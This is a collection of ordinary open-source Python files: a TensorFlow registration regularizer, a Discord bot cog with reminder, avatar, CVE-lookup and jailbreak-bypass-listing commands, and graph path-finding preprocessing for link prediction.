norms = dTdx ** 2 + dTdy ** 2 + dTdz ** 2
return tf.reduce_mean(norms, [1, 2, 3, 4])
def compute_bending_energy(displacement):
dTdx = gradient_txyz(displacement, gradient_dx)
dTdy = gradient_txyz(displacement, gradient_dy)
dTdz = gradient_txyz(displacement, gradient_dz)
dTdxx = gradient_txyz(dTdx, gradient_dx)
dTdyy = gradient_txyz(dTdy, gradient_dy)
dTdzz = gradient_txyz(dTdz, gradient_dz)
dTdxy = gradient_txyz(dTdx, gradient_dy)
dTdyz = gradient_txyz(dTdy, gradient_dz)
dTdxz = gradient_txyz(dTdx, gradient_dz)
return tf.reduce_mean(
dTdxx ** 2
+ dTdyy ** 2
+ dTdzz ** 2
+ 2 * dTdxy ** 2
+ 2 * dTdxz ** 2
+ 2 * dTdyz ** 2,
[1, 2, 3, 4],
)
if energy_type == "bending":
return compute_bending_energy(ddf)
elif energy_type == "gradient-l2":
return compute_gradient_norm(ddf)
elif energy_type == "gradient-l1":
return compute_gradient_norm(ddf, l1=True)
else:
raise ValueError("Unknown regularizer.")
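The `gradient_dx/dy/dz` helpers above are central finite differences evaluated on interior voxels. A 1-D, dependency-free sketch of that stencil (the real code applies it along each axis of a 5-D displacement tensor):

```python
def central_diff(values):
    # (f[i+1] - f[i-1]) / 2 on interior points, matching gradient_dx above
    return [(values[i + 1] - values[i - 1]) / 2 for i in range(1, len(values) - 1)]

# derivative estimates for f(x) = x**2 sampled at x = 0..4
print(central_diff([0, 1, 4, 9, 16]))  # [2.0, 4.0, 6.0]
```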
# --- cogs/commands/misc/misc.py (repo: DiscordGIR/Bloo, license: MIT) ---
import base64
import datetime
import io
import json
import traceback
import aiohttp
import discord
import pytimeparse
from data.services.guild_service import guild_service
from discord.commands import Option, slash_command, message_command, user_command
from discord.ext import commands
from discord.utils import format_dt
from PIL import Image
from utils.autocompleters import (bypass_autocomplete, get_ios_cfw,
rule_autocomplete)
from utils.config import cfg
from utils.context import BlooContext
from utils.logger import logger
from utils.menu import BypassMenu
from utils.permissions.checks import (PermissionsFailure, mod_and_up,
whisper, whisper_in_general)
from utils.permissions.permissions import permissions
from utils.permissions.slash_perms import slash_perms
from yarl import URL
class PFPView(discord.ui.View):
def __init__(self, ctx: BlooContext):
super().__init__(timeout=30)
self.ctx = ctx
async def on_timeout(self):
for child in self.children:
child.disabled = True
await self.ctx.respond_or_edit(view=self)
class PFPButton(discord.ui.Button):
def __init__(self, ctx: BlooContext, member: discord.Member):
super().__init__(label="Show other avatar", style=discord.ButtonStyle.primary)
self.ctx = ctx
self.member = member
self.other = False
async def callback(self, interaction: discord.Interaction):
if interaction.user != self.ctx.author:
return
if not self.other:
avatar = self.member.guild_avatar
self.other = not self.other
else:
avatar = self.member.avatar or self.member.default_avatar
self.other = not self.other
embed = interaction.message.embeds[0]
embed.set_image(url=avatar.replace(size=4096))
animated = ["gif", "png", "jpeg", "webp"]
not_animated = ["png", "jpeg", "webp"]
def fmt(format_):
return f"[{format_}]({avatar.replace(format=format_, size=4096)})"
if avatar.is_animated():
embed.description = f"View As\n {' '.join([fmt(format_) for format_ in animated])}"
else:
embed.description = f"View As\n {' '.join([fmt(format_) for format_ in not_animated])}"
await interaction.response.edit_message(embed=embed)
class BypassDropdown(discord.ui.Select):
def __init__(self, ctx, apps):
self.ctx = ctx
self.apps = {app.get("bundleId"): app for app in apps}
options = [
discord.SelectOption(label=app.get("name"), value=app.get("bundleId"), description="Bypasses found" if app.get("bypasses") else "No bypasses found", emoji='<:appstore:392027597648822281>') for app in apps
]
super().__init__(placeholder='Pick an app...',
min_values=1, max_values=1, options=options)
async def callback(self, interaction):
if interaction.user != self.ctx.author:
return
self.view.stop()
app = self.apps.get(self.values[0])
self.ctx.app = app
if not app.get("bypasses"):
await self.ctx.send_error("No bypasses found for this app!")
return
menu = BypassMenu(self.ctx, app.get("bypasses"), per_page=1,
page_formatter=format_bypass_page, whisper=self.ctx.whisper)
await menu.start()
async def on_timeout(self):
self.disabled = True
self.placeholder = "Timed out"
await self.ctx.edit(view=self._view)
def format_bypass_page(ctx, entries, current_page, all_pages):
ctx.current_bypass = entries[0]
embed = discord.Embed(title=ctx.app.get(
"name"), color=discord.Color.blue())
embed.set_thumbnail(url=ctx.app.get("icon"))
embed.description = f"You can use **{ctx.current_bypass.get('name')}**!"
if ctx.current_bypass.get("notes") is not None:
embed.add_field(name="Note", value=ctx.current_bypass.get('notes'))
embed.color = discord.Color.orange()
if ctx.current_bypass.get("version") is not None:
embed.add_field(name="Supported versions",
value=f"This bypass works on versions {ctx.current_bypass.get('version')} of the app")
embed.set_footer(
text=f"Powered by ios.cfw.guide • Bypass {current_page} of {len(all_pages)}")
return embed
class Misc(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.spam_cooldown = commands.CooldownMapping.from_cooldown(
3, 15.0, commands.BucketType.channel)
try:
with open('emojis.json') as f:
self.emojis = json.loads(f.read())
except:
raise Exception(
"Could not find emojis.json. Make sure to run scrape_emojis.py")
@whisper()
@slash_command(guild_ids=[cfg.guild_id], description="Send yourself a reminder after a given time gap")
async def remindme(self, ctx: BlooContext, reminder: Option(str, description="What do you want to be reminded?"), duration: Option(str, description="When do we remind you? (i.e 1m, 1h, 1d)")):
"""Sends you a reminder after a given time gap
Example usage
-------------
/remindme 1h bake the cake
Parameters
----------
duration : str
"After when to send the reminder"
reminder : str
"What to remind you of"
"""
now = datetime.datetime.now()
delta = pytimeparse.parse(duration)
if delta is None:
raise commands.BadArgument(
"Please give me a valid time to remind you! (i.e 1h, 30m)")
time = now + datetime.timedelta(seconds=delta)
if time < now:
raise commands.BadArgument("Time has to be in the future >:(")
reminder = discord.utils.escape_markdown(reminder)
ctx.tasks.schedule_reminder(ctx.author.id, reminder, time)
# natural_time = humanize.naturaldelta(
# delta, minimum_unit='seconds')
embed = discord.Embed(title="Reminder set", color=discord.Color.random(
), description=f"We'll remind you {discord.utils.format_dt(time, style='R')}")
await ctx.respond(embed=embed, ephemeral=ctx.whisper, delete_after=5)
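`remindme` relies on `pytimeparse.parse` to turn strings like "1h" or "30m" into seconds. A stdlib-only stand-in that covers only the s/m/h/d suffixes (the unit table is an assumption, not pytimeparse's full grammar):

```python
import re

_UNITS = {'s': 1, 'm': 60, 'h': 3600, 'd': 86400}

def parse_duration(text):
    # minimal stand-in for pytimeparse.parse: "1h30m" -> 5400 seconds
    matches = re.findall(r'(\d+)([smhd])', text)
    if not matches:
        return None  # mirrors pytimeparse returning None on unparseable input
    return sum(int(n) * _UNITS[u] for n, u in matches)

print(parse_duration('1h30m'))  # 5400
```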
@slash_command(guild_ids=[cfg.guild_id], description="Post large version of a given emoji")
async def jumbo(self, ctx: BlooContext, emoji: str):
"""Posts large version of a given emoji
Example usage
-------------
/jumbo <emote>
Parameters
----------
emoji : str
"Emoji to enlarge"
"""
# non-mod users will be ratelimited
bot_chan = guild_service.get_guild().channel_botspam
if not permissions.has(ctx.guild, ctx.author, 5) and ctx.channel.id != bot_chan:
bucket = self.spam_cooldown.get_bucket(ctx.interaction)
if bucket.update_rate_limit():
raise commands.BadArgument("This command is on cooldown.")
# is this a regular Unicode emoji?
try:
em = await commands.PartialEmojiConverter().convert(ctx, emoji)
except commands.PartialEmojiConversionFailure:
em = emoji
if isinstance(em, str):
async with ctx.typing():
emoji_url_file = self.emojis.get(em)
if emoji_url_file is None:
raise commands.BadArgument(
"Couldn't find a suitable emoji.")
im = Image.open(io.BytesIO(base64.b64decode(emoji_url_file)))
image_container = io.BytesIO()
im.save(image_container, 'png')
image_container.seek(0)
_file = discord.File(image_container, filename='image.png')
await ctx.respond(file=_file)
else:
await ctx.respond(em.url)
@whisper()
@slash_command(guild_ids=[cfg.guild_id], description="Get avatar of another user or yourself.")
async def avatar(self, ctx: BlooContext, member: Option(discord.Member, description="User to get avatar of", required=False)) -> None:
"""Posts the avatar of the given member, or your own
Example usage
-------------
/avatar member:<member>
Parameters
----------
member : discord.Member, optional
"Member to get avatar of"
"""
if member is None:
member = ctx.author
await self.handle_avatar(ctx, member)
@whisper()
@user_command(guild_ids=[cfg.guild_id], name="View avatar")
async def avatar_rc(self, ctx: BlooContext, member: discord.Member):
await self.handle_avatar(ctx, member)
@whisper()
@message_command(guild_ids=[cfg.guild_id], name="View avatar")
async def avatar_msg(self, ctx: BlooContext, message: discord.Message):
await self.handle_avatar(ctx, message.author)
async def handle_avatar(self, ctx, member: discord.Member):
embed = discord.Embed(title=f"{member}'s avatar")
animated = ["gif", "png", "jpeg", "webp"]
not_animated = ["png", "jpeg", "webp"]
avatar = member.avatar or member.default_avatar
def fmt(format_):
return f"[{format_}]({avatar.replace(format=format_, size=4096)})"
if member.display_avatar.is_animated():
embed.description = f"View As\n {' '.join([fmt(format_) for format_ in animated])}"
else:
embed.description = f"View As\n {' '.join([fmt(format_) for format_ in not_animated])}"
embed.set_image(url=avatar.replace(size=4096))
embed.color = discord.Color.random()
view = PFPView(ctx)
if member.guild_avatar is not None:
view.add_item(PFPButton(ctx, member))
view.message = await ctx.respond(embed=embed, ephemeral=ctx.whisper, view=view)
@whisper_in_general()
@slash_command(guild_ids=[cfg.guild_id], description="View information about a CVE")
async def cve(self, ctx: BlooContext, id: str):
"""View information about a CVE
Example usage
-------------
/cve <id>
Parameters
----------
id : str
"ID of CVE to lookup"
"""
try:
async with aiohttp.ClientSession() as client:
async with client.get(URL(f'https://cve.circl.lu/api/cve/{id}', encoded=True)) as resp:
response = json.loads(await resp.text())
embed = discord.Embed(title=response.get(
'id'), color=discord.Color.random())
embed.description = response.get('summary')
embed.add_field(name="Published", value=response.get(
'Published'), inline=True)
embed.add_field(name="Last Modified",
value=response.get('Modified'), inline=True)
embed.add_field(name="Complexity", value=response.get(
'access').get('complexity').title(), inline=False)
embed.set_footer(text="Powered by https://cve.circl.lu")
await ctx.respond(embed=embed, ephemeral=ctx.whisper)
except Exception:
raise commands.BadArgument("Could not find CVE.")
@whisper_in_general()
@slash_command(guild_ids=[cfg.guild_id], description="Find out how to bypass jailbreak detection for an app")
async def bypass(self, ctx: BlooContext, app: Option(str, description="Name of the app", autocomplete=bypass_autocomplete)):
await ctx.defer(ephemeral=ctx.whisper)
data = await get_ios_cfw()
bypasses = data.get('bypass')
matching_apps = [body for _, body in bypasses.items() if app.lower() in body.get("name").lower()]
if not matching_apps:
raise commands.BadArgument(
"The API does not recognize that app or there are no bypasses available.")
# matching_app = bypasses[matching_apps[0]]
# print(matching_app)
if len(matching_apps) > 1:
view = discord.ui.View(timeout=30)
apps = matching_apps[:25]
apps.sort(key=lambda x: x.get("name"))
menu = BypassDropdown(ctx, apps)
view.add_item(menu)
view.on_timeout = menu.on_timeout
embed = discord.Embed(
description="Which app would you like to view bypasses for?", color=discord.Color.blurple())
await ctx.respond(embed=embed, view=view, ephemeral=ctx.whisper)
else:
ctx.app = matching_apps[0]
bypasses = ctx.app.get("bypasses")
if not bypasses or bypasses is None or bypasses == [None]:
raise commands.BadArgument(
f"{ctx.app.get('name')} has no bypasses.")
menu = BypassMenu(ctx, ctx.app.get(
"bypasses"), per_page=1, page_formatter=format_bypass_page, whisper=ctx.whisper)
await menu.start()
@slash_command(guild_ids=[cfg.guild_id], description="Post the embed for one of the rules")
async def rule(self, ctx: BlooContext, title: Option(str, autocomplete=rule_autocomplete), user_to_mention: Option(discord.Member, description="User to mention in the response", required=False)):
if title not in self.bot.rule_cache.cache:
potential_rules = [r for r in self.bot.rule_cache.cache if title.lower() == r.lower(
) or title.strip() == f"{r} - {self.bot.rule_cache.cache[r].description}"[:100].strip()]
if not potential_rules:
raise commands.BadArgument(
"Rule not found! Title must match one of the embeds exactly, use autocomplete to help!")
title = potential_rules[0]
embed = self.bot.rule_cache.cache[title]
if user_to_mention is not None:
title = f"Hey {user_to_mention.mention}, have a look at this!"
else:
title = None
await ctx.respond_or_edit(content=title, embed=embed)
@slash_command(guild_ids=[cfg.guild_id], description="Get the topic for a channel")
async def topic(self, ctx: BlooContext, channel: Option(discord.TextChannel, description="Channel to get the topic from", required=False), user_to_mention: Option(discord.Member, description="User to mention in the response", required=False)):
"""get the channel's topic"""
channel = channel or ctx.channel
if channel.topic is None:
raise commands.BadArgument(f"{channel.mention} has no topic!")
if user_to_mention is not None:
title = f"Hey {user_to_mention.mention}, have a look at this!"
else:
title = None
embed = discord.Embed(title=f"#{channel.name}'s topic",
description=channel.topic, color=discord.Color.blue())
await ctx.respond_or_edit(content=title, embed=embed)
@mod_and_up()
@slash_command(guild_ids=[cfg.guild_id], description="Start a poll", permissions=slash_perms.mod_and_up())
async def poll(self, ctx: BlooContext, question: str, channel: Option(discord.TextChannel, required=False, description="Where to post the message") = None):
if channel is None:
channel = ctx.channel
embed = discord.Embed(description=question, color=discord.Color.random())
embed.timestamp = datetime.datetime.now()
embed.set_footer(text=f"Poll started by {ctx.author}")
message = await channel.send(embed=embed)
emojis = ['⬆️', '⬇️']
for emoji in emojis:
await message.add_reaction(emoji)
ctx.whisper = True
await ctx.send_success("Done!")
@slash_command(guild_ids=[cfg.guild_id], description="View the status of various Discord features")
@commands.guild_only()
async def dstatus(self, ctx):
async with aiohttp.ClientSession() as session:
async with session.get("https://discordstatus.com/api/v2/components.json") as resp:
if resp.status == 200:
components = await resp.json()
async with aiohttp.ClientSession() as session:
async with session.get("https://discordstatus.com/api/v2/incidents.json") as resp:
if resp.status == 200:
incidents = await resp.json()
api_status = components.get('components')[0].get('status').title() # API
mp_status = components.get('components')[4].get('status').title() # Media Proxy
pn_status = components.get('components')[6].get('status').title() # Push Notifications
s_status = components.get('components')[8].get('status').title() # Search
v_status = components.get('components')[11].get('status').title() # Voice
cf_status = components.get('components')[2].get('status').title() # Cloudflare
all_operational = all(s == "Operational" for s in (api_status, mp_status, pn_status, s_status, v_status, cf_status))
title = "All Systems Operational" if all_operational else "Known Incident"
color = discord.Color.green() if title == "All Systems Operational" else discord.Color.orange()
last_incident = incidents.get('incidents')[0].get('name')
last_status = incidents.get('incidents')[0].get('status').title()
last_created = datetime.datetime.strptime(incidents.get('incidents')[0].get('created_at'), "%Y-%m-%dT%H:%M:%S.%f%z")
last_update = datetime.datetime.strptime(incidents.get('incidents')[0].get('updated_at'), "%Y-%m-%dT%H:%M:%S.%f%z")
last_impact = incidents.get('incidents')[0].get('impact')
online = '<:status_online:942288772551278623>'
offline = '<:status_dnd:942288811818352652>'
incident_icons = {'none': '<:status_offline:942288832051679302>',
'maintenance': '<:status_total:942290485916073995>',
'minor': '<:status_idle:942288787000680499>',
'major': '<:status_dnd:942288811818352652>',
'critical': '<:status_dnd:942288811818352652>'}
embed = discord.Embed(title=title, description=f"""
{online if api_status == 'Operational' else offline} **API:** {api_status}
{online if mp_status == 'Operational' else offline} **Media Proxy:** {mp_status}
{online if pn_status == 'Operational' else offline} **Push Notifications:** {pn_status}
{online if s_status == 'Operational' else offline} **Search:** {s_status}
{online if v_status == 'Operational' else offline} **Voice:** {v_status}
{online if cf_status == 'Operational' else offline} **Cloudflare:** {cf_status}
__**Last outage information**__
**Incident:** {incident_icons.get(last_impact)} {last_incident}
**Status:** {online if last_status == 'Resolved' else offline} {last_status}
**Identified at:** {format_dt(last_created, style='F')}
**{'Resolved at' if last_status == 'Resolved' else 'Last updated'}:** {format_dt(last_update, style='F')}
""", color=color)
embed.set_footer(text="Powered by discordstatus.com")
await ctx.respond(embed=embed)
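`dstatus` reads a statuspage-style `components.json` payload and title-cases each component's `status` field. A sketch of the overall-title computation on a hypothetical payload (the component names and statuses below are invented sample data, not live API output):

```python
# hypothetical components.json-style payload, for illustration only
components = {
    "components": [
        {"name": "API", "status": "operational"},
        {"name": "Media Proxy", "status": "operational"},
        {"name": "Voice", "status": "partial_outage"},
    ]
}

# mirrors the code above: .title() each status, then check they are all Operational
statuses = [c.get("status").title() for c in components.get("components")]
title = "All Systems Operational" if all(s == "Operational" for s in statuses) else "Known Incident"
print(title)  # Known Incident
```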
@topic.error
@rule.error
@poll.error
@bypass.error
@cve.error
@dstatus.error
@remindme.error
@jumbo.error
@avatar.error
async def info_error(self, ctx: BlooContext, error):
if isinstance(error, discord.ApplicationCommandInvokeError):
error = error.original
if (isinstance(error, commands.MissingRequiredArgument)
or isinstance(error, PermissionsFailure)
or isinstance(error, commands.BadArgument)
or isinstance(error, commands.BadUnionArgument)
or isinstance(error, commands.MissingPermissions)
or isinstance(error, commands.BotMissingPermissions)
or isinstance(error, commands.MaxConcurrencyReached)
or isinstance(error, commands.NoPrivateMessage)):
await ctx.send_error(error)
else:
await ctx.send_error("A fatal error occured. Tell <@109705860275539968> about this.")
logger.error(traceback.format_exc())
def setup(bot):
bot.add_cog(Misc(bot))
# --- src/preprocessing.py (repo: smartdatalake/pathlearn, license: Apache-2.0) ---
"""This module provides various functions used to read/write and generate the data structures used for Path Learn"""
import networkx as nx
import random as rnd
import numpy as np
import pandas as pd
import os
def find_single_paths(G, node, lim, paths_lim=float('inf')):
"""
:param G: A NetworkX graph.
:param node: A node v.
:param lim: Maximum number of steps.
:param paths_lim: Maximum number of paths.
:return: All paths up to lim steps, starting from node v.
"""
paths = []
to_extend = [[node]]
while to_extend and len(paths) < paths_lim:
cur_path = to_extend.pop(0)
paths.append(cur_path)
if len(cur_path) < 2 * lim + 1:
for neigh in G[cur_path[-1]]:
if neigh not in cur_path:
for rel_id in G[cur_path[-1]][neigh]:
ext_path = list(cur_path)
ext_path.append(rel_id)
ext_path.append(neigh)
to_extend.append(ext_path)
return paths[1:]
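`find_single_paths` only needs mapping-style access (`G[node]` for neighbours, `G[u][v]` for edge keys), so a plain nested dict can stand in for a NetworkX MultiGraph in a quick check. The function body is copied from above; the toy graph is an assumption:

```python
def find_single_paths(G, node, lim, paths_lim=float('inf')):
    # breadth-first enumeration of alternating node/edge-id paths, as above
    paths = []
    to_extend = [[node]]
    while to_extend and len(paths) < paths_lim:
        cur_path = to_extend.pop(0)
        paths.append(cur_path)
        if len(cur_path) < 2 * lim + 1:
            for neigh in G[cur_path[-1]]:
                if neigh not in cur_path:
                    for rel_id in G[cur_path[-1]][neigh]:
                        ext_path = list(cur_path)
                        ext_path.append(rel_id)
                        ext_path.append(neigh)
                        to_extend.append(ext_path)
    return paths[1:]

# nested dict mimicking a MultiGraph: node -> neighbour -> edge_id -> attrs
G = {'a': {'b': {0: {}}},
     'b': {'a': {0: {}}, 'c': {0: {}}},
     'c': {'b': {0: {}}}}

print(find_single_paths(G, 'a', lim=2))
# [['a', 0, 'b'], ['a', 0, 'b', 0, 'c']]
```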
def has_circles(path):
"""
:param path: A sequence of node/edges
:return: True if the path contains circles
"""
nodes = set()
for i, n in enumerate(path):
if i % 2 == 0:
if n in nodes:
return True
else:
nodes.add(n)
return False
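Because paths alternate node, edge-id, node, only even indices hold nodes, which is why `has_circles` checks `i % 2 == 0`. A quick check (function copied from above, toy paths assumed):

```python
def has_circles(path):
    # even indices hold nodes; a repeated node means the path has a cycle
    nodes = set()
    for i, n in enumerate(path):
        if i % 2 == 0:
            if n in nodes:
                return True
            nodes.add(n)
    return False

print(has_circles(('a', 'r1', 'b', 'r2', 'a')))  # True
print(has_circles(('a', 'r1', 'b', 'r2', 'c')))  # False
```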
def find_paths_between(G, start, end, length):
"""
Finds all paths up to a given length between two nodes.
:param G: NetworkX graph.
:param start: Start node.
:param end: End node.
:param length: Maximum path length.
:return: A set with all paths up to *length* from *start* to *end*.
"""
if length % 2 == 0:
length1 = length / 2
length2 = length / 2
else:
length1 = int(length / 2) + 1
length2 = int(length / 2)
paths1 = find_single_paths(G, start, length1)
paths2 = find_single_paths(G, end, length2)
path2_ind = {}
for path2 in paths2:
if path2[-1] not in path2_ind:
path2_ind[path2[-1]] = []
path2_ind[path2[-1]].append(path2)
full_paths = set()
if end in G[start]:
for edge_id in G[start][end]:
full_paths.add((start, edge_id, end))
for path1 in paths1:
try:
ext_paths = path2_ind[path1[-1]]
except:
ext_paths = []
for ext_path in ext_paths:
full_path = tuple(path1 + list(reversed(ext_path[0:-1])))
if not has_circles(full_path):
full_paths.add(full_path)
return full_paths
def find_pair_paths(G, all_pairs, length, rev_rel=None):
"""
Finds paths between a collection of node pairs.
:param G: NetworkX graph.
:param all_pairs: A collection of node pairs.
:param length: Maximum path length
:param rev_rel: Type of reverse relation, for directed graphs.
:return: A two level dictionary with the paths for each pair.
"""
T = {}
if not rev_rel:
rev_rel = all_pairs[0][1]
for count, pair in enumerate(all_pairs):
print('finding paths: ' + str(count) + '/' + str(len(all_pairs)))
start = pair[0]
rel = pair[1]
end = pair[2]
rev_pair = (end, rev_rel, start)
if start not in T:
T[start] = {}
if end not in T[start]:
T[start][end] = set()
# paths = nx.all_simple_paths(G,start,end,length)
paths = find_paths_between(G, start, end, length)
for path in paths:
path_ext = []
dirty = False
for i in range(1, len(path) - 1):
if i % 2 == 0:
path_ext.append(path[i])
else:
step_rel = G[path[i - 1]][path[i + 1]][path[i]]['type']
step_pair = (path[i - 1], step_rel, path[i + 1])
if (step_pair[0] != pair[0] or step_pair[1] != pair[1] or step_pair[2] != pair[2]) and (
step_pair[0] != rev_pair[0] or step_pair[1] != rev_pair[1] or step_pair[2] !=
rev_pair[2]):
path_ext.append(step_rel)
else:
dirty = True
break
if not dirty:
T[start][end].add(tuple(path_ext))
print('returning')
return T
def find_single_pair_paths(G, pair, length, rev_rel=None):
"""
Finds all paths for a single pair of nodes.
:param G: NetworkX graph.
:param pair: The node pair.
:param length: Maximum length.
:param rev_rel: Reverse relation type, for directed graphs.
:return: All paths up to *length( between the pair.
"""
if not rev_rel:
rev_rel = pair[1]
start = pair[0]
rel = pair[1]
end = pair[2]
rev_pair = [end, rev_rel, start]
paths = find_paths_between(G, start, end, length)
paths_out = set()
for path in paths:
path_ext = []
dirty = False
for i in range(1, len(path) - 1):
if i % 2 == 0:
path_ext.append(path[i])
else:
step_rel = G[path[i - 1]][path[i + 1]][path[i]]['type']
step_pair = [path[i - 1], step_rel, path[i + 1]]
if step_pair != pair and step_pair != rev_pair:
path_ext.append(step_rel)
else:
dirty = True
break
if not dirty:
paths_out.add(tuple(path_ext))
return paths_out
def add_paths(G, pair_set, steps, rev_rel, T):
"""
Adds new paths to path dictionary T.
:param G: Networkx graph.
:param pair_set: A collection of pairs.
:param steps: Maximum path length.
:param rev_rel: Reverse relation type, for directed graphs.
:param T: A path dictionary T.
:return: A path dictionary T that includes paths for pairs in pair_set.
"""
T_new = find_pair_paths(G, pair_set, steps, rev_rel)
for u in T_new:
if u not in T:
T[u] = {}
for v in T_new[u]:
if v not in T[u]:
T[u][v] = set()
for path in T_new[u][v]:
T[u][v].add(path)
return T
def add_Ts(T0,T1):
"""
Merges two path dictionaries.
:param T0: A path dictionary.
:param T1: A path dictionary.
:return: A merged path dictionary.
"""
for u in T1:
if u not in T0:
T0[u] = {}
for v in T1[u]:
if v not in T0[u]:
T0[u][v] = set()
for path in T1[u][v]:
T0[u][v].add(path)
return T0
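The path dictionaries are keyed start node → end node → set of path tuples, so merging with `add_Ts` amounts to a per-pair set union. A quick check (function copied from above, sample dictionaries assumed):

```python
def add_Ts(T0, T1):
    # merge path dictionary T1 into T0 (start -> end -> set of path tuples)
    for u in T1:
        if u not in T0:
            T0[u] = {}
        for v in T1[u]:
            if v not in T0[u]:
                T0[u][v] = set()
            for path in T1[u][v]:
                T0[u][v].add(path)
    return T0

T0 = {'a': {'b': {('a', 'r1', 'b')}}}
T1 = {'a': {'b': {('a', 'r2', 'b')}}, 'c': {'d': {('c', 'r1', 'd')}}}
merged = add_Ts(T0, T1)
print(len(merged['a']['b']))  # 2 paths for the ('a', 'b') pair
```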
def graph_to_files(G, path):
    """
    Saves graph to file.
    :param G: NetworkX graph.
    :param path: Folder path.
    """
    nodes = list(G.nodes)
    node_types = [G.nodes[n]['type'] for n in nodes]
    for type in set(node_types):
        print('writing type ' + str(type))
        node_feats = []
        nodes_of_type = [n for n in G if G.nodes[n]['type'] == type]
        for n in nodes_of_type:
            node_feats.append([n] + (G.nodes[n]['features'] if 'features' in G.nodes[n] else [0]))
        column_names = ['id'] + ['feat_' + str(i) for i in range(len(node_feats[0]) - 1)]
        pd.DataFrame(node_feats, columns=column_names).fillna(0).to_csv(path + '/nodes/' + str(type) + '.csv', index=False)
    print('writing relations')
    edges = list(G.edges)
    edge_feats = []
    for e in edges:
        edge_feats.append([e[0], e[1], G[e[0]][e[1]][int(e[2])]['type']] + (G[e[0]][e[1]][int(e[2])]['features'] if 'features' in G[e[0]][e[1]][int(e[2])] else [0]))
    column_names = ['src', 'dst', 'type'] + ['feat_' + str(i) for i in range(max([len(ef) for ef in edge_feats]) - 3)]
    pd.DataFrame(edge_feats, columns=column_names).fillna(0).to_csv(path + '/relations/relations.csv', index=False)
def graph_from_files(path):
    """
    Reads graph from file.
    :param path: Folder path.
    :return: NetworkX graph.
    """
    G = nx.MultiDiGraph()
    for file in os.listdir(path + '/nodes'):
        print('loading ' + file)
        node_type = file.split('.')[-2]
        nodes = pd.read_csv(path + '/nodes/' + file, dtype={0: str})
        for i, row in nodes.iterrows():
            row = list(row)
            G.add_node(str(row[0]), type=node_type, features=row[1:])
    print('loading relations')
    edges = pd.read_csv(path + '/relations/relations.csv', dtype={0: str, 1: str, 2: str})
    for i, row in edges.iterrows():
        row = list(row)
        G.add_edge(str(row[0]), str(row[1]), type=str(row[2]), features=row[3:])
    return G
# def make_small_data(G):
#     nodes = np.array(list(G.nodes))
#     node_types = np.array([G.nodes[n]['type'] for n in nodes])
#     sel_nodes = set()
#     for type in set(node_types):
#         print('writing type ' + str(type))
#         node_feats = []
#         for n in nodes[node_types == type][0:10000]:
#             sel_nodes.add(n)
#             node_feats.append([n] + G.nodes[n]['features'])
#         column_names = ['id'] + ['feat_' + str(i) for i in range(len(node_feats[0]) - 1)]
#         pd.DataFrame(node_feats, columns=column_names).fillna(0).to_csv('../data/small/' + '/nodes/' + str(type) + '.csv', index=False)
#     print('writing relations')
#     edges = list(G.edges)
#     edge_feats = []
#     for e in edges:
#         if e[0] in sel_nodes and e[1] in sel_nodes:
#             edge_feats.append([e[0], e[1], G[e[0]][e[1]][e[2]]['type']] + G[e[0]][e[1]][e[2]]['features'])
#     column_names = ['src', 'dst', 'type'] + ['feat_' + str(i) for i in range(max([len(ef) for ef in edge_feats]) - 3)]
#     pd.DataFrame(edge_feats, columns=column_names).fillna(0).to_csv('../data/small/' + '/relations/relations.csv', index=False)
def types_from_files(path):
    """
    Gets node/edge types of graph files.
    :param path: Folder path.
    :return: dict with node/edge types.
    """
    node_types = []
    for file in os.listdir(path + '/nodes'):
        node_types.append(file.split('.')[0])
    edge_types = list(set(pd.read_csv(path + '/relations/relations.csv').iloc[:, 2].astype(str)))
    return {'node_types': node_types, 'edge_types': edge_types}
def add_neg_samples(G, pos_pairs, samp_size, steps):
    """
    Performs negative sampling.
    :param G: NetworkX graph.
    :param pos_pairs: A collection of pairs with edges.
    :param samp_size: Negative samples per existing edge.
    :param steps: Max length of random walk.
    :return: A list of positive and negative node pairs and their labels.
    """
    pairs = []
    labels = []
    print(pos_pairs[0])
    tail_type = G.nodes[pos_pairs[0][2]]['type']
    print(tail_type)
    tails = set([n for n in G.nodes if G.nodes[n]['type'] == tail_type])
    for i, (head, rel_id, tail) in enumerate(pos_pairs):
        print('neg samples {}/{}'.format(i, len(pos_pairs)))
        pos = set(G[head])
        near = set(nx.ego_graph(G, head, steps).nodes) - pos
        # near = set([n for n in subG if G.nodes[n] == tail_type]) - pos
        # for j in range(1, steps):
        #     near -= set(nx.ego_graph(G, head, steps - j).nodes)
        # sample from lists: random.sample() no longer accepts sets (Python 3.11+)
        near_samp = rnd.sample(list(near), min(len(near), samp_size))
        far = tails - pos - near
        far_samp = rnd.sample(list(far), min(len(far), samp_size))
        pairs.append([head, rel_id, tail])
        labels.append(1)
        for tail in near_samp:
            pairs.append([head, rel_id, tail])
            labels.append(0)
        for tail in far_samp:
            pairs.append([head, rel_id, tail])
            labels.append(0)
    return pairs, labels
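# The near/far split above can be sketched with the standard library alone.
# The toy adjacency dict and node names below are hypothetical; the real code
# builds the neighbourhood with nx.ego_graph instead of the hand-rolled BFS here.

```python
import random

# Toy undirected adjacency: 'h' is the head node.
adj = {'h': {'a', 'b'}, 'a': {'h', 'c'}, 'b': {'h'}, 'c': {'a'}, 'd': set()}

def near_far_candidates(adj, head, steps=2):
    # Breadth-limited neighbourhood of `head` (like an ego graph of radius `steps`).
    frontier, seen = {head}, {head}
    for _ in range(steps):
        frontier = {m for n in frontier for m in adj[n]} - seen
        seen |= frontier
    pos = adj[head]                 # direct neighbours = positive edges
    near = seen - pos - {head}      # reachable but not directly linked
    far = set(adj) - seen - pos     # outside the neighbourhood entirely
    return near, far

near, far = near_far_candidates(adj, 'h')
rng = random.Random(0)
near_samp = rng.sample(sorted(near), min(len(near), 1))
far_samp = rng.sample(sorted(far), min(len(far), 1))
print(near, far)  # {'c'} {'d'}
```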
def find_node_types(G, edge_type):
    """
    :param G: NetworkX graph.
    :param edge_type: Edge type.
    :return: Node types that correspond to the edge type.
    """
    for e in G.edges:
        if G[e[0]][e[1]][e[2]]['type'] == edge_type:
            u, v = e[0], e[1]
            break
    utype = G.nodes[u]['type']
    vtype = G.nodes[v]['type']
    try:
        if int(utype) > int(vtype):
            return utype, vtype
        else:
            return vtype, utype
    except (ValueError, TypeError):  # non-numeric type labels: keep (u, v) order
        return utype, vtype
def find_candidate_type(G, edge_type, src_node):
    """
    :param G: NetworkX graph.
    :param edge_type: An edge type.
    :param src_node: A source node.
    :return: The node type that is connected by edge_type to src_node.
    """
    stype = G.nodes[src_node]['type']
    for e in G.edges:
        if G[e[0]][e[1]][e[2]]['type'] == edge_type:
            u, v = e[0], e[1]
            break
    utype = G.nodes[u]['type']
    vtype = G.nodes[v]['type']
